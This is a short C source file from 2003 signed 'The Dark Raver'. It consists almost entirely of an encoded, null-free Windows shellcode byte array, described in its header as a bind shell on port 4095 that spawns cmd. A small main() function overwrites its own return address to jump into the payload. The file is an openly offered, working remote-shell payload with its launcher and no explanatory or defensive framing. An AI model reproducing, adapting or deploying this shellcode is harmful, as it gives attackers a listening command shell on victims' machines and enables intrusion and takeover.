// The Dark Raver <darkraver@t0s.org>
// 26/01/2003
// 576 bytes
// BINDSHELL + CMD
// - Port: 4095
// - Find API offsets
// - Without nulls
// - Encoded
// - With ExitThread()

char _hell[]=
"\xeb\x0f\x5e\x31\xc9\x66\xb9\x29\x02\x80\x36\x31\x46\xe2\xfa\xeb\x05\xe8\xec\xff\xff\xff\x64\xb8\xd4\xb0"
"\xdd\x69\x33\x31\x31\x55\x90\x01\x31\x31\x31\xba\x71\x3d\xba\x41\x2d\x9c\xba\x71\x39\x61\xba\xf9\x32\x71"
"\x0d\xba\x49\x49\x32\xc8\xba\x46\x11\x32\xc0\x02\xe3\xba\x37\x32\xf0\xb0\x09\x76\x54\x45\x61\x44\x2f\xb0"
"\x49\x35\x43\x5e\x52\x70\x44\x24\xba\x76\x15\x32\xf0\x3e\x86\x2d\x61\xba\x76\x2d\x32\xf0\xba\x2d\xa9\x30"
"\xfa\xda\x38\xb2\xf7\x35\x73\x0a\x66\x29\x44\xfc\x69\x61\xd9\x3e\x31\x31\x31\x72\x43\x54\x50\x45\x54\x61"
"\x43\x5e\x52\x54\x42\x42\x70\x31\x61\xce\xe2\xb8\x74\x35\x69\x61\xd9\x3a\x31\x31\x31\x74\x49\x58\x45\x65"
"\x59\x43\x54\x50\x55\x31\x61\xce\xe2\xb8\x74\x1d\x69\xd9\x3c\x31\x31\x31\x7d\x5e\x50\x55\x7d\x58\x53\x43"
"\x50\x43\x48\x70\x31\x61\xce\xe2\xd9\x3a\x31\x31\x31\x46\x42\x03\x6e\x02\x03\x1f\x55\x5d\x5d\x31\xce\xe1"
"\xba\xc1\xd9\x3a\x31\x31\x31\x66\x62\x70\x62\x45\x50\x43\x45\x44\x41\x31\x67\xce\xe2\xb8\x74\x39\xd9\x3a"
"\x31\x31\x31\x66\x62\x70\x62\x5e\x52\x5a\x54\x45\x70\x31\x67\xce\xe2\xb8\x74\x3d\xd9\x34\x31\x31\x31\x53"
"\x58\x5f\x55\x31\x67\xce\xe2\xb8\x74\x21\xd9\x36\x31\x31\x31\x5d\x58\x42\x45\x54\x5f\x31\x67\xce\xe2\xb8"
"\x74\x25\xd9\x36\x31\x31\x31\x50\x52\x52\x54\x41\x45\x31\x67\xce\xe2\xb8\x74\x29\xf6\xb4\xd5\xcc\xce\xce"
"\x21\x31\x31\x31\xbc\xb4\x59\xcf\xce\xce\x61\x59\x30\x30\x31\x31\xba\x74\x39\xce\xe1\x5b\x31\x5b\x31\x5b"
"\x31\x5b\x31\x5b\x30\x5b\x33\xba\x74\x3d\xce\xe1\xb8\xb4\x51\xcf\xce\xce\x57\xf6\xb4\xd9\xcc\xce\xce\x33"
"\x31\x57\xf6\xb4\xdb\xcc\xce\xce\x3e\xce\xf6\xb4\xdd\xcc\xce\xce\x31\x31\x31\x31\x5b\x21\xbc\xb4\xd9\xcc"
"\xce\xce\x61\xba\xb4\x51\xcf\xce\xce\x61\xba\x74\x21\xce\xe1\x5b\x34\xba\xb4\x51\xcf\xce\xce\x61\xba\x74"
"\x25\xce\xe1\xbc\xb4\xd5\xcc\xce\xce\x61\xbc\xb4\xd9\xcc\xce\xce\x61\xba\xb4\x51\xcf\xce\xce\x61\xba\x74"
"\x29\xce\xe1\xb8\xb4\x55\xcf\xce\xce\xbc\x8c\x79\xcf\xce\xce\x81\x31\x88\x27\x31\x31\x31\xc2\x9b\xbc\x8c"
"\xc9\xcc\xce\xce\x81\x31\x88\x59\x31\x31\x31\xc2\x9b\xf6\xb4\x15\xcf\xce\xce\x30\x30\x31\x31\x57\xf6\xb4"
"\x19\xcf\xce\xce\x31\x31\xba\xb4\x55\xcf\xce\xce\xb8\xb4\x05\xcf\xce\xce\xb8\xb4\x09\xcf\xce\xce\xb8\xb4"
"\x01\xcf\xce\xce\xbc\xb4\x79\xcf\xce\xce\x61\xbc\xb4\xc9\xcc\xce\xce\x61\x5b\x31\x5b\x31\x5b\x31\x5b\x30"
"\x5b\x31\x5b\x31\xd9\x39\x31\x31\x31\x52\x5c\x55\x1f\x54\x49\x54\x31\x5b\x31\xba\x74\x35\xce\xe1\xba\x74"
"\x1d\xce\xe1"; // TDR

int main()
{
int *ret;

printf("%d\n",strlen(_hell));

ret = (int *)&ret + 2;
(*ret) = (int)_hell;
}